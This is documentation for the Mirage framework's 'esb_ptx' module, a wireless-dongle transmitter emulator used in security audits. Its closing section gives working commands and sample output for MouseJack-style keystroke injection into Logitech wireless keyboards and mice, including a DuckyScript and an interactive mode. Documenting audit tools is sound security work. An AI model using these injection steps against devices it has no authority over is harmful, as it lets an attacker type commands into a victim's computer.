esb_ptx ======== Presentation ------------ **esb_ptx** simulates a PTX device's behaviour. It is a core module for the framework, allowing to quickly build recurrent behaviours during a security audit. If a scenario is provided, the module is launched in "scenario" mode, with events given as callbacks on specific packet types, allowing to implement complex interactions. Otherwise, it is launched in "interpreter" mode, opening a CLI for the user. A follow mode is provided thanks to the *FOLLOW_MODE* parameter, allowing to regularly check if the corresponding PRX is responding on the current channel. It sends ping request every second and if no acknowledgement frame is received, then the module will automatically scan channels in order to find it. Compatible devices ------------------ * `RFStorm Device `_ Input parameters ----------------- +----------------------------------------+---------------------------------------+-------------------------------------------------------------+--------------------------------------------------------------------------+ | Name | Default value | Possible values | Description | +========================================+=======================================+=============================================================+==========================================================================+ | INTERFACE | rfstorm0 | rfstormX | Interface to use | +----------------------------------------+---------------------------------------+-------------------------------------------------------------+--------------------------------------------------------------------------+ | TARGET | | | Target address | +----------------------------------------+---------------------------------------+-------------------------------------------------------------+--------------------------------------------------------------------------+ | FOLLOW_MODE | yes | yes|no | Follow mode | +----------------------------------------+---------------------------------------+-------------------------------------------------------------+--------------------------------------------------------------------------+ | SCENARIO | | | Scenario to use | +----------------------------------------+---------------------------------------+-------------------------------------------------------------+--------------------------------------------------------------------------+ Scenario signals ----------------- The behaviour of this module can be modified using scenarios. If you need more details about Mirage scenarios, their usage is described `here `_. The following signals are generated by this module if a scenario is provided using the *SCENARIO* input parameter : +----------------------------------------+-------------------------------------------------------------------+--------------------------------------------------------------------------------------+------------------------------------------------------------------+ | Signal | Parameters | Activation | Default behaviour | +========================================+===================================================================+======================================================================================+==================================================================+ | onStart | | when the module starts its execution | nothing is executed | +----------------------------------------+-------------------------------------------------------------------+--------------------------------------------------------------------------------------+------------------------------------------------------------------+ | onEnd | | when the module stops its execution | nothing is executed | +----------------------------------------+-------------------------------------------------------------------+--------------------------------------------------------------------------------------+------------------------------------------------------------------+ | onKey | key | when a key is pressed | nothing is executed | +----------------------------------------+-------------------------------------------------------------------+--------------------------------------------------------------------------------------+------------------------------------------------------------------+ | onESBAckResponse | packet | when an incoming acknowledgment is received (from PRX) | nothing is executed | +----------------------------------------+-------------------------------------------------------------------+--------------------------------------------------------------------------------------+------------------------------------------------------------------+ | onPingFailure | | when the ping response acknowledgement is not received (from PRX) | nothing is executed | +----------------------------------------+-------------------------------------------------------------------+--------------------------------------------------------------------------------------+------------------------------------------------------------------+ | onPRXFound | | when the PRX has been found by the scan initiated after the ping failure | nothing is executed | +----------------------------------------+-------------------------------------------------------------------+--------------------------------------------------------------------------------------+------------------------------------------------------------------+ You can manually stop the module's execution by calling the method **stopScenario**: :: self.module.stopScenario() Commands -------- The following commands are available in the CLI interface : - **clear** : clears the screen - **channel** : displays the current channel - **channel ** : moves to the provided channel - **scan** : calls the `esb_scan `_ module to list near ESB devices - **scan ** : calls the `esb_scan `_ module for the specified duration to list near ESB devices - **scan ** : calls the `esb_scan `_ module for the specified duration on the specified channel range to list near ESB devices - **address** : displays the address currently selected - **address ** : changes the address to the one provided - **find_prx** : performs an active scan in order to find the corresponding PRX - **find_prx ** : performs an active scan in order to find the corresponding PRX in the selected channel range (e.g. "0-10") - **follow_prx** : enables the follow mode - **unfollow_prx** : disables the follow mode - **send ** : sends a specific payload to the PRX - **send ,,...** : sends multiple payloads to the PRX - **exit** : ends the execution Usage ------ CLI mode ^^^^^^^^^ If you want to use this module in *CLI* mode, just calls the module without input parameters : :: $ mirage esb_ptx [INFO] Module esb_ptx loaded ! [PTX|12]: You can easily scan the devices using the ``scan`` command : :: [PTX|99]: scan ┌────────────────┬──────────┬──────────┐ │ Address │ Channels │ Protocol │ ├────────────────┼──────────┼──────────┤ │ E8:46:F9:2F:A4 │ 8 │ logitech │ └────────────────┴──────────┴──────────┘ ())))))))))))))))))))))))))))))))))))))))))))))))))___________) Channel: 81 Then, you can select a specific address using ``address`` : :: [PTX|98]: address E8:46:F9:2F:A4 [PTX|98|E8:46:F9:2F:A4]: You can automatically find the PRX using the ``find_prx`` command : :: [PTX|98|E8:46:F9:2F:A4]: find_prx [SUCCESS] ACK received from PRX on channel #8 [PTX| 8|E8:46:F9:2F:A4]: Or you can also manually set the channel using ``channel`` command : :: [PTX| 8|E8:46:F9:2F:A4]: channel 23 [PTX|23|E8:46:F9:2F:A4]: You can enable the follow mode using ``follow_prx`` command: :: [PTX|23|E8:46:F9:2F:A4]: follow_prx [PTX| 8|E8:46:F9:2F:A4]: and disable it using ``unfollow_prx``: :: [PTX| 8|E8:46:F9:2F:A4]: unfollow_prx [PTX| 8|E8:46:F9:2F:A4]: Finally, you can easily transmit payloads using ``send``: :: [PTX| 8|E8:46:F9:2F:A4]: send 0f0f0f0f [SUCCESS] ACK received. [PTX| 8|E8:46:F9:2F:A4]: send 0f0f0f0f,1122,3344 [SUCCESS] ACK received. [SUCCESS] ACK received. [SUCCESS] ACK received. Customizing the behaviour using scenarios ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ If you want to use a scenario, you can use the ``create_scenario`` command in order to generate a basic code : :: $ mirage --create_scenario [QUESTION] Scenario's name : esb_ptx_test [SUCCESS] Scenario master_test successfully generated : /home/user/.mirage/scenarios/esb_ptx_test.py [INFO] Mirage process terminated ! Then, you can modify the code as you want. If you want to use this scenario, just provide its name as the value of the input parameter *SCENARIO* : :: $ sudo mirage esb_ptx SCENARIO=esb_ptx_test [INFO] Module esb_ptx loaded ! [INFO] Scenario loaded ! [...] [INFO] Mirage process terminated ! Performing keystrokes injection attacks ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Two main scenarios are provided, allowing to easily perform the unencrypted and encrypted keystrokes injection attacks targeting Logitech mices and keyboards described in `MouseJack whitepaper `_: * **logitech_unencrypted_keystrokes_injection**: This scenario allows to inject unencrypted keystrokes to a wireless mouse address, bypassing the encryption. * **logitech_encrypted_keystrokes_injection**: This scenario allows to inject forged encrypted keystrokes by exploiting a weakness in the AES implementation of Logitech Unifying. These scenarios can be used by providing them as a scenario to the module. They can be used in three modes : If you want to inject a simple text, provide a new parameter named *TEXT* to the module: :: $ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection TEXT=bonjour [INFO] Module esb_ptx loaded ! [INFO] Enabling following mode ... [INFO] Scenario loaded ! [INFO] Following mode disabled by the scenario. [INFO] Generating attack stream ... [INFO] Text injection: bonjour [INFO] Looking for target E8:46:F9:2F:A4... [SUCCESS] Target found ! [INFO] Injecting ... bonjour If you want to perform a more complex keystrokes injection, you can provide a duckyscript file: :: $ cat > /tmp/duck.ducky DELAY 1000 ALT F2 DELAY 1000 STRING firefox https://homepages.laas.fr/rcayre/mirage-documentation DELAY 1000 ENTER $ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection DUCKYSCRIPT=/tmp/duck.ducky [INFO] Module esb_ptx loaded ! [INFO] Enabling following mode ... [INFO] Scenario loaded ! [INFO] Following mode disabled by the scenario. [INFO] Generating attack stream ... [INFO] Duckyscript injection: /tmp/duck.ducky [INFO] Looking for target E8:46:F9:2F:A4... [SUCCESS] Target found ! [INFO] Injecting ... [INFO] Terminating scenario ... [INFO] Mirage process terminated ! Finally, you can also use the interactive mode in order to directly interact with the target computer: :: $ mirage esb_ptx TARGET=E8:46:F9:2F:A4 SCENARIO=logitech_unencrypted_keystrokes_injection INTERACTIVE=yes [INFO] Module esb_ptx loaded ! [INFO] Enabling following mode ... [INFO] Scenario loaded ! [INFO] Following mode disabled by the scenario. [INFO] Generating attack stream ... [INFO] Interactive mode [INFO] Looking for target E8:46:F9:2F:A4... [SUCCESS] Target found ! [INFO] Injecting ... [INFO] Injecting:b [INFO] Injecting:o [INFO] Injecting:n [INFO] Injecting:j [INFO] Injecting:o [INFO] Injecting:u [INFO] Injecting:r [...]